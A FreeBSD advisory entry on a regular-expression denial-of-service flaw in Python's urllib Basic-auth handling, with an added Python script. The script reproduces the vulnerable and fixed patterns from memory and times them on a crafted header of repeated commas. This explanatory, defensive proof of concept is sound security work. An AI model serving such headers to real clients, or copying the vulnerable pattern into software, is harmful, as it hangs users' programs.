Python -- Regular Expression DoS attack against client

2019-11-17T00:00:00
ID A27B0BB6-84FC-11EA-B5B4-641C67A117D8
Type freebsd
Reporter FreeBSD
Modified 2020-06-13T00:00:00

Description

Ben Caller and Matt Schwager report:

Python 2.7 through 2.7.17, 3.5 through 3.5.9, 3.6 through 3.6.10, 3.7 through 3.7.6, and 3.8 through 3.8.1 allows an HTTP server to conduct Regular Expression Denial of Service (ReDoS) attacks against a client because of urllib.request.AbstractBasicAuthHandler catastrophic backtracking.
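The catastrophic backtracking lives in the regular expression that AbstractBasicAuthHandler uses to pull the scheme and realm out of a WWW-Authenticate header when a server answers 401. The following stand-alone script is an added example, not code from the advisory or from CPython: it reproduces the pre-fix pattern and the anchored pattern that replaced it upstream as I recall them from the CPython source (verify both against the urllib/request.py of the interpreter you are auditing), parses a benign challenge with each, and times each one on a constructed hostile header so the exponential growth is visible. The header value, the helper names and the comma counts are all assumptions of this demo.

```python
import re
import time

# Challenge-parsing patterns. VULNERABLE_RX is the pattern that
# urllib.request.AbstractBasicAuthHandler used in the affected releases and
# FIXED_RX is the replacement shipped with the fix; both are reproduced from
# memory of the CPython source and should be compared with your interpreter's
# urllib/request.py. This file is a demo, not the CPython code itself.
VULNERABLE_RX = re.compile(
    r'(?:.*,)*[ \t]*([^ \t]+)[ \t]+realm=(["\']?)([^"\']*)\2', re.I)

# Anchoring each challenge to the start of the value or to a comma, and keeping
# ',' out of the scheme token, removes the nested (?:.*,)* quantifier: each
# search start consumes every character at most once, so the work is linear.
FIXED_RX = re.compile(
    r'(?:^|,)[ \t]*([^ \t,]+)[ \t]+realm=(["\']?)([^"\']*)\2', re.I)


def extract_challenge(www_authenticate, rx=FIXED_RX):
    """Return (scheme, realm) from a WWW-Authenticate value, or None.

    Mirrors what http_error_auth_reqed does with the header before deciding
    whether to retry the request with Basic credentials.
    """
    mo = rx.search(www_authenticate)
    if mo is None:
        return None
    scheme, _quote, realm = mo.groups()
    return scheme, realm


def hostile_header(n_commas):
    """Constructed attacker-controlled header value (assumption of this demo):
    a scheme token followed by commas and no 'realm=', so the match must fail
    and the vulnerable pattern tries every way of splitting the commas among
    repetitions of (?:.*,)* before giving up: about 2**n_commas attempts."""
    return "Basic " + "," * n_commas


def search_seconds(rx, value):
    """Wall-clock time of one rx.search(value); returns (match, seconds)."""
    t0 = time.perf_counter()
    result = rx.search(value)
    return result, time.perf_counter() - t0


if __name__ == "__main__":
    # Both patterns agree on a well-formed challenge.
    print(extract_challenge('Basic realm="example"'))
    print(extract_challenge('Basic realm="example"', VULNERABLE_RX))
    # The vulnerable pattern roughly doubles its running time per extra comma;
    # the fixed pattern stays flat. Raise the counts with care.
    for n in (14, 16, 18, 20):
        value = hostile_header(n)
        _, fixed_t = search_seconds(FIXED_RX, value)
        _, vuln_t = search_seconds(VULNERABLE_RX, value)
        print(f"{n:2d} commas: fixed {fixed_t * 1e6:8.0f} us"
              f"   vulnerable {vuln_t * 1e6:10.0f} us")
```

A client is exposed only if it has installed an HTTPBasicAuthHandler (or ProxyBasicAuthHandler) in its opener and follows a URL to a server the attacker controls; the server needs nothing more than a 401 response carrying such a header. The same script can be pointed at a patched interpreter by importing urllib.request and timing urllib.request.AbstractBasicAuthHandler.rx directly in place of VULNERABLE_RX.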